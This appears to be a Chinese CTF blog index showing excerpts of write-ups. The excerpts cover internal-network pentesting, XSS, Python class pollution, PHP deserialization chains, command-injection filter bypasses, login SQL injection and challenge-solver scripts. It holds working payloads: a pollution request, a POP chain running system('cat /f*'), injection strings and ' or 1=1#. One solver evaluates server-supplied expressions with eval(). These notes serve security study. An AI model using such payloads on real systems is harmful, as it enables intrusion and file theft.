花蕊·Blog

internalwww

ctfshow内网渗透复现复现过程先放一下ssh命令: ssh ctfshow@pwn.challenge.ctf.show -p 28169 #用于ssh连接题目shell scp -P 28169 local_file ctfshow@pwn.challenge.ctf.show:/tmp #用于上传东西 1.根据提示寻找有用的工具题目提示我们攻击机有工具，利用find命令可以找到。或者直接乱翻文件，msf就在/opt目录下. find / -name metasploit-framework 直接使用msfconsole报错，使用chmod 777 metasploit-framework 给权限后可以直接使用了 2.扫描因为是内网渗透，所以还是要做一些扫描。上传fscan并扫描内网 scp -P 28169 local_file ctfshow@pwn.challenge.ctf.show:/remote/directory/ ifconfig #查看ip ./fscan -h 172.2.162.4/24 -o fscan.log #扫描 3.公鸡这里我在网上找到个很奇怪的解，已知445端口存在一个samba的洞，可以直接打下来 ...

关于xss在src的补充

关于xss在src的补充写在前面好久没有再接触过xss，最近系统性地重新学了一遍，现在再做一些补充分类和识别能直接出回显的是反射型xss 能直接写入，刷新还在的是存储型xss ：常见于评论 XSS常用payload xss: <script>alert(123);</script> <a href="">xxx</ a> dom xss:视情况而定

python原型链污染

遇到一道原型链污染的题目学习一下原题(basectf2024) 请解释J1ngHong说：你想read flag吗？那么圣钥之光必将阻止你！但是小小的源码没事，因为你也读不到flag(乐) from flask import Flask,request import json app = Flask(__name__) def merge(src, dst): for k, v in src.items(): if hasattr(dst, '__getitem__'): if dst.get(k) and type(v) == dict: merge(v, dst.get(k)) else: dst[k] = v elif hasattr(dst, k) and type(v) == dict: merge(v, getattr(dst, k)) else: setattr(dst, k, v) def is_json(data): try: json.loads(data) return True except ValueError: return False class cls(): def __init__(self): pass instance = cls() @app.route('/', methods=['GET', 'POST']) def hello_world(): return open('/static/index.html', encoding="utf-8").read() @app.route('/read', methods=['GET', 'POST']) def Read(): file = open(__file__, encoding="utf-8").read() return f"J1ngHong说：你想read flag吗？那么圣钥之光必将阻止你！但是小小的源码没事，因为你也读不到flag(乐) {file} " @app.route('/pollute', methods=['GET', 'POST']) def Pollution(): if request.is_json: merge(json.loads(request.data),instance) else: return "J1ngHong说：钥匙圣洁无暇，无人可以污染！" return "J1ngHong说：圣钥暗淡了一点，你居然污染成功了？" if __name__ == '__main__': app.run(host='0.0.0.0',port=80) 原型链污染分析 class father: secret = "hello" class son_a(father): pass class son_b(father): pass def merge(src, dst): for k, v in src.items(): if hasattr(dst, '__getitem__'): if dst.get(k) and type(v) == dict: merge(v, dst.get(k)) else: dst[k] = v elif hasattr(dst, k) and type(v) == dict: merge(v, getattr(dst, k)) else: setattr(dst, k, v) instance = son_b() payload = { "__class__" : { "__base__" : { "secret" : "world" } } } print(son_a.secret) #hello print(instance.secret) #hello merge(payload, instance) print(son_a.secret) #world print(instance.secret) #world 最终payload GET /pollute HTTP/1.1 Host: challenge.basectf.fun:39759 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 X-Forwarded-For: 127.0.0.1 Priority: u=0, i Content-Type: application/json Content-Length: 108 { "__init__":{ "__globals__":{ "__file__":"flag" } } } 贴个链接 ...

biji

笔记杂笔记在逆向(星号)((BYTE*)的时候用宏定义#define BYTE unsigned char即可正常使用 system(“tac flag.php”)用来读取文件内容; ?c=system(“tac%20fla(星号)")意思是c=system(“tac flag”); 在linux的shell里： ls /（查看所有目录) ls /home(进入home文件夹) cat /home/flag.txt(打开flag.txt) tac用法同上 ls ../输出上一级目录的内容命令绕过黑洞绕过：system($c.” >/dev/null 2>&1"); 它只会让分号后面的指令进入黑洞，所以这里直接绕过双写分号绕过?c=tac f*;ls 双写&&绕过?c=tac f*%26%26ls（注：星号被绕过可以用问号）（[0-9]和%的过滤是不会过滤%26之类的）（）带行号绕过?c=nl<fla’‘g.php%7C%7Cls(此方法可能要右键看源代码) 有$的情况下可以重命名flag.php成txt再直接访问:先执行?c=mv${IFS}fla?.php${IFS}a.txt%7C%7Cls 然后使用ls||ls看看有没有命名成功。成功后直接访问a.txt ...

一些php特性

一些php特性关于"." 当 php 版本⼩于 8 时，GET 请求的参数名含有 . ，会被转为 _ ，但是如果参数名中有 [ ，这个 [ 会被直接转为 _ ，但是后⾯如果有 . ，这个 . 就不会被转为 _ 。有如 Jail_by.Happy 等同于 ?Jail[by.Happy=xxxxxx 并有: highlight_file(glob("/f*")[0]); 这段代码的作用是用 PHP 读取并高亮显示一个文件的内容。下面是对各部分的详细解释： glob("/f*")：glob 函数用于根据模式匹配文件路径。模式 /f* 表示匹配所有以 f 开头的文件或目录。在这个上下文中，它会列出路径为 / 目录下所有以 f 开头的文件或目录。 glob("/f*")[0]：glob 函数返回一个文件路径数组。[0] 是用来访问第一个匹配的文件路径。如果存在多个匹配项，这里只取第一个。 highlight_file()：highlight_file 函数用于显示一个文件的内容，并对其进行语法高亮。默认情况下，highlight_file 只输出文件内容，不能作为字符串返回。它是直接在浏览器中输出文件内容的 HTML 代码。

mathma

basectf数学大师脚本脚本： import requests from bs4 import BeautifulSoup import re from requests.cookies import RequestsCookieJar result = 1 session_cookie = 1 for i in range(50): url = "http://challenge.basectf.fun:35901/" headers = { "Cache-Control": "max-age=0", "sec-ch-ua": '" Not A;Brand";v="99", "Chromium";v="104"', "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": '"Windows"', "Upgrade-Insecure-Requests": "1", "Origin": "http://127.0.0.1:63738", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Cookie": 'PHPSESSID='+f"{session_cookie}", "Referer": "http://127.0.0.1:63738/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close" } data = { "answer": f"{result}", } response = requests.post(url, headers=headers, data=data) print(response.text) match = re.search(r'me in 3 second (.+?)\?', response.text) if match: expression = match.group(1) expression = expression.replace('×', '*').replace('÷', '/') result = eval(expression) result = round(float(result)) print(result) cookies_text = str(response.cookies) print(cookies_text) # 示例 CookiesJar match = re.search(r'PHPSESSID=([a-zA-Z0-9]+)', cookies_text) if match: phpsessid_value = match.group(1) print(phpsessid_value) # 输出: r6vfuu1vs0ij7sf6saa8576lk8 session_cookie = phpsessid_value

反序列化中私有属性无法访问的解决办法

反序列化中私有属性无法访问的解决办法前情提要今天做了一下basectf 的反序列化，遇到了一个php语言版本较低，导致无法解析私有属性的访问的题目。原题 <?php highlight_file(__FILE__); class Sink { private $cmd = 'echo 123;'; public function __toString() { eval($this->cmd); } } class Shark { private $word = 'Hello, World!'; public function __invoke() { echo 'Shark says:' . $this->word; } } class Sea { public $animal; public function __get($name) { $sea_ani = $this->animal; echo 'In a deep deep sea, there is a ' . $sea_ani(); } } class Nature { public $sea; public function __destruct() { echo $this->sea->see; } } if ($_POST['nature']) { $nature = unserialize($_POST['nature']); } EXP <?php class Sink { private $cmd = 'system("cat /f*");'; } class Shark { private $word; public function __construct() { $this->word=new Sink(); } } class Sea { public $animal; } class Nature { public $sea; } $x=new Sink; $y=new Shark; $z=new Sea; $a=new Nature; $a->sea=$z; $z->animal=$y; echo urlencode(serialize($a)); ?> 办法遇到私有属性的时候可以直接在exp中利用__construct()进行访问 ...

moectf铜人阵脚本

moectf铜人阵脚本 import requests from bs4 import BeautifulSoup import re from requests.cookies import RequestsCookieJar url = "http://127.0.0.1:49885/" headers = { "Cache-Control": "max-age=0", "sec-ch-ua": '" Not A;Brand";v="99", "Chromium";v="104"', "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": '"Windows"', "Upgrade-Insecure-Requests": "1", "Origin": "http://127.0.0.1:63738", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Referer": "http://127.0.0.1:63738/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close" } data = { "player": "77", "direct": "弟子明白" } response = requests.post(url, headers=headers, data=data) #print(response.status_code) #print(response.text) soup = BeautifulSoup(response.text, 'html.parser') status_element = soup.find('h1', id='status') status_text = status_element.get_text(strip=True) # 从响应头中提取 Cookies #cookies_text = response.cookies cookies_text = str(response.cookies) match = re.search(r'session=([a-zA-Z0-9._-]+)', cookies_text) if match: session_cookie = match.group(1) print(f"{session_cookie}") else: print("Session cookie not found") print(f"{session_cookie}") print(status_text) def get_direction_description(directions): # 定义方位字典 direction_map = { 1: "北方", 2: "东北方", 3: "东方", 4: "东南方", 5: "南方", 6: "西南方", 7: "西方", 8: "西北方" } # 去掉输入数据中的多余空白字符 directions = directions.strip() try: # 处理单个数字的情况 if ',' not in directions: direction = int(directions) return direction_map.get(direction, "无效输入") # 处理两个数字的情况 direction_list = [int(d.strip()) for d in directions.split(',')] if len(direction_list) == 2: desc1 = direction_map.get(direction_list[0], "无效输入") desc2 = direction_map.get(direction_list[1], "无效输入") if desc1 == "无效输入" or desc2 == "无效输入": return "无效输入" return f"{desc1}一个，{desc2}一个" else: return "无效输入" except ValueError: return "无效输入" # 测试代码 test_cases = [status_text] for case in test_cases: print(f"{get_direction_description(case)}") url = "http://127.0.0.1:49885/" headers = { "Cache-Control": "max-age=0", "sec-ch-ua": '" Not A;Brand";v="99", "Chromium";v="104"', "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": '"Windows"', "Upgrade-Insecure-Requests": "1", "Origin": "http://127.0.0.1:63738", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Referer": "http://127.0.0.1:63738/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Cookie": 'session='+f"{session_cookie}", "Connection": "close" } data = { "player": "77", "direct": get_direction_description(case) } response = requests.post(url, headers=headers, data=data) #print(response.status_code) #print(response.text) soup = BeautifulSoup(response.text, 'html.parser') status_element = soup.find('h1', id='status') status_text = status_element.get_text(strip=True) print(status_text) #cookies_text = response.cookies cookies_text = str(response.cookies) match = re.search(r'session=([a-zA-Z0-9._-]+)', cookies_text) if match: session_cookie = match.group(1) print(f"{session_cookie}") else: print("Session cookie not found") print(f"{session_cookie}") print(status_text) def get_direction_description(directions): # 定义方位字典 direction_map = { 1: "北方", 2: "东北方", 3: "东方", 4: "东南方", 5: "南方", 6: "西南方", 7: "西方", 8: "西北方" } # 去掉输入数据中的多余空白字符 directions = directions.strip() try: # 处理单个数字的情况 if ',' not in directions: direction = int(directions) return direction_map.get(direction, "无效输入") # 处理两个数字的情况 direction_list = [int(d.strip()) for d in directions.split(',')] if len(direction_list) == 2: desc1 = direction_map.get(direction_list[0], "无效输入") desc2 = direction_map.get(direction_list[1], "无效输入") if desc1 == "无效输入" or desc2 == "无效输入": return "无效输入" return f"{desc1}一个，{desc2}一个" else: return "无效输入" except ValueError: return "无效输入" # 测试代码 test_cases = [status_text] for case2 in test_cases: print(f"{get_direction_description(case2)}") url = "http://127.0.0.1:49885/" headers = { "Cache-Control": "max-age=0", "sec-ch-ua": '" Not A;Brand";v="99", "Chromium";v="104"', "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": '"Windows"', "Upgrade-Insecure-Requests": "1", "Origin": "http://127.0.0.1:63738", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Referer": "http://127.0.0.1:63738/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Cookie": 'session='+f"{session_cookie}", "Connection": "close" } data = { "player": "77", "direct": get_direction_description(case2) } response = requests.post(url, headers=headers, data=data) #print(response.status_code) #print(response.text) soup = BeautifulSoup(response.text, 'html.parser') status_element = soup.find('h1', id='status') status_text = status_element.get_text(strip=True) print(status_text) #cookies_text = response.cookies cookies_text = str(response.cookies) match = re.search(r'session=([a-zA-Z0-9._-]+)', cookies_text) if match: session_cookie = match.group(1) print(f"{session_cookie}") else: print("Session cookie not found") print(f"{session_cookie}") print(status_text) def get_direction_description(directions): # 定义方位字典 direction_map = { 1: "北方", 2: "东北方", 3: "东方", 4: "东南方", 5: "南方", 6: "西南方", 7: "西方", 8: "西北方" } # 去掉输入数据中的多余空白字符 directions = directions.strip() try: # 处理单个数字的情况 if ',' not in directions: direction = int(directions) return direction_map.get(direction, "无效输入") # 处理两个数字的情况 direction_list = [int(d.strip()) for d in directions.split(',')] if len(direction_list) == 2: desc1 = direction_map.get(direction_list[0], "无效输入") desc2 = direction_map.get(direction_list[1], "无效输入") if desc1 == "无效输入" or desc2 == "无效输入": return "无效输入" return f"{desc1}一个，{desc2}一个" else: return "无效输入" except ValueError: return "无效输入" # 测试代码 test_cases = [status_text] for case2 in test_cases: print(f"{get_direction_description(case2)}") url = "http://127.0.0.1:49885/" headers = { "Cache-Control": "max-age=0", "sec-ch-ua": '" Not A;Brand";v="99", "Chromium";v="104"', "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": '"Windows"', "Upgrade-Insecure-Requests": "1", "Origin": "http://127.0.0.1:63738", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Referer": "http://127.0.0.1:63738/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Cookie": 'session='+f"{session_cookie}", "Connection": "close" } data = { "player": "77", "direct": get_direction_description(case2) } response = requests.post(url, headers=headers, data=data) #print(response.status_code) #print(response.text) soup = BeautifulSoup(response.text, 'html.parser') status_element = soup.find('h1', id='status') status_text = status_element.get_text(strip=True) print(status_text) #cookies_text = response.cookies cookies_text = str(response.cookies) match = re.search(r'session=([a-zA-Z0-9._-]+)', cookies_text) if match: session_cookie = match.group(1) print(f"{session_cookie}") else: print("Session cookie not found") print(f"{session_cookie}") print(status_text) def get_direction_description(directions): # 定义方位字典 direction_map = { 1: "北方", 2: "东北方", 3: "东方", 4: "东南方", 5: "南方", 6: "西南方", 7: "西方", 8: "西北方" } # 去掉输入数据中的多余空白字符 directions = directions.strip() try: # 处理单个数字的情况 if ',' not in directions: direction = int(directions) return direction_map.get(direction, "无效输入") # 处理两个数字的情况 direction_list = [int(d.strip()) for d in directions.split(',')] if len(direction_list) == 2: desc1 = direction_map.get(direction_list[0], "无效输入") desc2 = direction_map.get(direction_list[1], "无效输入") if desc1 == "无效输入" or desc2 == "无效输入": return "无效输入" return f"{desc1}一个，{desc2}一个" else: return "无效输入" except ValueError: return "无效输入" # 测试代码 test_cases = [status_text] for case2 in test_cases: print(f"{get_direction_description(case2)}") url = "http://127.0.0.1:49885/" headers = { "Cache-Control": "max-age=0", "sec-ch-ua": '" Not A;Brand";v="99", "Chromium";v="104"', "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": '"Windows"', "Upgrade-Insecure-Requests": "1", "Origin": "http://127.0.0.1:63738", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Referer": "http://127.0.0.1:63738/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Cookie": 'session='+f"{session_cookie}", "Connection": "close" } data = { "player": "77", "direct": get_direction_description(case2) } response = requests.post(url, headers=headers, data=data) #print(response.status_code) #print(response.text) soup = BeautifulSoup(response.text, 'html.parser') status_element = soup.find('h1', id='status') status_text = status_element.get_text(strip=True) print(status_text) #cookies_text = response.cookies cookies_text = str(response.cookies) match = re.search(r'session=([a-zA-Z0-9._-]+)', cookies_text) if match: session_cookie = match.group(1) print(f"{session_cookie}") else: print("Session cookie not found") print(f"{session_cookie}") print(status_text) def get_direction_description(directions): # 定义方位字典 direction_map = { 1: "北方", 2: "东北方", 3: "东方", 4: "东南方", 5: "南方", 6: "西南方", 7: "西方", 8: "西北方" } # 去掉输入数据中的多余空白字符 directions = directions.strip() try: # 处理单个数字的情况 if ',' not in directions: direction = int(directions) return direction_map.get(direction, "无效输入") # 处理两个数字的情况 direction_list = [int(d.strip()) for d in directions.split(',')] if len(direction_list) == 2: desc1 = direction_map.get(direction_list[0], "无效输入") desc2 = direction_map.get(direction_list[1], "无效输入") if desc1 == "无效输入" or desc2 == "无效输入": return "无效输入" return f"{desc1}一个，{desc2}一个" else: return "无效输入" except ValueError: return "无效输入" # 测试代码 test_cases = [status_text] for case2 in test_cases: print(f"{get_direction_description(case2)}") url = "http://127.0.0.1:49885/" headers = { "Cache-Control": "max-age=0", "sec-ch-ua": '" Not A;Brand";v="99", "Chromium";v="104"', "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": '"Windows"', "Upgrade-Insecure-Requests": "1", "Origin": "http://127.0.0.1:63738", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Referer": "http://127.0.0.1:63738/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Cookie": 'session='+f"{session_cookie}", "Connection": "close" } data = { "player": "77", "direct": get_direction_description(case2) } response = requests.post(url, headers=headers, data=data) #print(response.status_code) #print(response.text) soup = BeautifulSoup(response.text, 'html.parser') status_element = soup.find('h1', id='status') status_text = status_element.get_text(strip=True) print(status_text)

有关登录型sql注入的补充

有关登录型sql注入的补充登录型sql注入特征形如下列语句即为登录型 $sql = "SELECT * FROM admin WHERE email='$email' AND pwd='$pwd'"; 注入方法以及原理万能密码: ' or 1=1# 在用户名输入框中输入:’ or 1=1#,密码随便输入，这时候的合成后的SQL查询语句为： select * from users where username='' or 1=1#' and password=md5('') 语义分析：“#”在mysql中是注释符，这样井号后面的内容将被mysql视为注释内容，这样就不会去执行了，换句话说，以下的两句sql语句等价： select * from users where username='' or 1=1#' and password=md5('') 等价于 select * from users where username='' or 1=1 SQL注入采用的’ OR 1=1 # 是什么意思呢？ ...

php挺有趣的题目

挺有趣的题目先说一下is_numeric()的绕过 is_numeric() 函数会判断如果是数字和数字字符串则返回 TRUE，否则返回 FALSE,且php中弱类型比较时，会使(‘1234a’ == 1234)为真，或者'12345%00’ 题目 <?php highlight_file('final1l1l_challenge.php'); error_reporting(0); include 'flag.php'; $a = $_GET['a']; $b = $_POST['b']; if (isset($a) && isset($b)) { if (!is_numeric($a) && !is_numeric($b)) { if ($a == 0 && md5($a) == $b[$a]) { echo $flag; } else { die('noooooooooooo'); } } else { die( 'Notice the param type!'); } } else { die( 'Where is your param?'); } 这里我们需要知道一个要点 ...